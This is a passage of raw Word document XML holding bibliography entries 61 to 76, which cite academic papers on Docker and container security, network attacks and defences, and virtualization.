                      <w:t xml:space="preserve">pp. 856-859, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4787AC9F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="750D6687" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[61] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1E2333D1" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. Idhom, R. Alit, A. Fauzi and e. al, “Implementation of Web Server Security Against Denial of Service (DoS) Attacks,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Workshop on Environmental Science, Society, and Technology (WESTECH 2020), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-6, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="389728CD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3AF6257B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[62] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1008B1BC" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Shakeri, L. Veen and P. Grosso, “Evaluation of Container Overlays for Secure Data Sharing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings - 2020 IEEE 45th Local Computer Networks Symposium on Emerging Topics in Networking, LCN Symposium 2020, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 99-108, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="0C8130B9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1A052075" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[63] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="51BAF621" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. Data, “The Defense Against ARP Spoofing Attack Using Semi-Static ARP Cache Table,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">3rd International Conference on Sustainable Information Engineering and Technology, SIET 2018 - Proceedings, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 206-210, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="16897F66" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5336EFCA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[64] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7D99F644" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. Khan, O. Rehman and e. al, “Lightweight Testbed for Cybersecurity Experiments in SCADA-based Systems,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020 International Conference on Computing and Information Technology, ICCIT 2020, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-5, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3D056C29" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="33E926B9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[65] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="127F69AA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">L. L. Mentz, W. J. Loch and G. P. Koslovski, “Comparative experimental analysis of Docker container networking drivers,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings - 2020 IEEE 9th International Conference on Cloud Networking, CloudNet 2020, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-7, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3C1F1CEE" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="14132CBA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[66] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3EA78827" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Docker Documentaion, “Use bridge networks,” Docker, [Online]. Available: https://docs.docker.com/network/bridge/. [Accessed 21 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5760858C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="10A5AB5C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[67] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3EAB942E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">J. Nam, S. Lee, H. Seo and e. al, “BASTION: A Security Enforcement Network Stack for Container Networks,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020 USENIX Annual Technical Conference, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 81-95, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2B317877" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2CF027B9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[68] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1430B236" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">N. Gelernter, S. Kalma, B. Magnezi and H. Porcilan, “The Password Reset MitM Attack,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings - IEEE Symposium on Security and Privacy, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 251-267, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="08D15E32" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="23E74593" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[69] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7A64D1CB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Mouat, Docker Security: Using Containers Safely in Production, O'Reilly Media, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="192F286F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="63176AF8" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[70] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="146F9EE3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">G. I. Radchenko, A. Alaasam and A. N. Tchernykh, “Comparative Analysis of Virtualization Methods in Big Data Processing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Supercomputing Frontiers and Innovations, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 6, no. 1, pp. 48-79, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="6ADBF5B1" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="412EE61E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[71] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3F3EE4CA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. R. Manu, J. K. Patel and S. Akhtar, “A study, analysis and deep dive on cloud PAAS security in terms of Docker container security,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Proceedings of IEEE International Conference on Circuit, Power and Computing Technologies, ICCPCT 2016, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-13, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="5351BA46" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="136D7F1D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[72] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6AB24018" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Maheshwari, S. Deochake, R. De and e. al, “Comparative Study of Virtual Machines and Containers for DevOps Developers,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv preprint arXiv:1808.08192, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-9, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7DD6B547" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0163FC4E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[73] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="73D2ECE3" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">V. Jain, B. Singh and e. al, “Static Vulnerability Analysis of Docker Images,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IOP Conference Series: Materials Science and Engineering, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 1131, no. 1, pp. 12-18, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="322AF50B" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="30F55111" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[74] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4E33BEC9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Sultan, I. Ahmad and T. Dimitriou, “Container Security: Issues, Challenges, and the Road Ahead,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IEEE Access, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 7, pp. 52976-52996, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="17670B56" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="35078089" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[75] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7BDAE3EE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. P. Mullinix, E. Konomi, R. Davis and e. al, “On Security Measures for Containerized Applications Imaged with Docker,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv preprint arXiv:2008.04814, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2C0CC163" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="672AAF0B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[76] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6B8A19CD" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">K. Brady, S. Moon, T. Nguyen and e. al, “Docker Container Security in Cloud Computing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2020 10th Annual Computing and Communication Workshop and Conference, CCWC 2020, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 975-980, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2616709F" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0063CCCF" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
